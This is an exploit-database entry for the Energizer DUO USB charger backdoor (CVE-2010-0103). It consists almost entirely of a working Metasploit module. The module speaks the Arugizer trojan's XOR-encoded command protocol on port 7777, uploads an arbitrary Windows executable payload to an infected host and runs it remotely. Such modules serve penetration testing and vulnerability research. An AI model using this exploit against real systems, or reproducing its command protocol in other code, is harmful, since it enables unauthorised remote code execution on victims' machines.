Energizer DUO USB Battery Charger Unauthorized Access Vulnerability

2010-03-18
ID: 9702
CVE: None
Download vulnerable application: None
Credit:          Ed Schaller
Vulnerable:     Energizer DUO 0
  ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
  require 'msf/core'
  class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking
         include Msf::Exploit::Remote::Tcp
         def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Energizer DUO Trojan Code Execution',
                        'Description'    => %q{
                                This module will execute an arbitrary payload against
                        any system infected with the Arugizer trojan horse. This
                        backdoor was shipped with the software package accompanying
                        the Energizer Duo USB battery charger.
                        },
                        'Author'         => [ 'hdm' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 8749 $',
                        'References'     =>
                                [
                                        ['CVE', '2010-0103'],
                                        ['URL', 'http://www.kb.cert.org/vuls/id/154421']
                                ],
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { } ],
                                ],
                        'DefaultTarget'  => 0
                        ))
                  register_options(
                        [
                                Opt::RPORT(7777),
                        ], self.class)
        end
         def trojan_encode(str)
                str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
        end
         def trojan_command(cmd)
                cid = ""
                 case cmd
                when :exec
                        cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
                when :dir
                        cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
                when :write
                        cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
                when :read
                        cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
                when :nop
                        cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
                when :find
                        cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
                when :yes
                        cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
                when :runonce
                        cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
                when :delete
                        cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
                end
                 trojan_encode(
                        [cid.length + 1].pack("V") + cid  + "\x00"
                )
        end
         def exploit
                 nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
                exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"
                  print_status("Trying to upload #{nam}...")
                connect
                 # Write file request
                sock.put(trojan_command(:write))
                sock.put(trojan_encode([nam.length].pack("V")))
                sock.put(trojan_encode(nam))
                sock.put(trojan_encode([exe.length].pack("V")))
                sock.put(trojan_encode(exe))
                 # Required to prevent the server from spinning a loop
                sock.put(trojan_command(:nop))
                 disconnect
                 #
                # Execute the payload
                #
                 print_status("Trying to execute #{nam}...")
                 connect
                 # Execute file request
                sock.put(trojan_command(:exec))
                sock.put(trojan_encode([nam.length].pack("V")))
                sock.put(trojan_encode(nam))
                 # Required to prevent the server from spinning a loop
                sock.put(trojan_command(:nop))
                 disconnect
        end
end
1-4-2 (www02)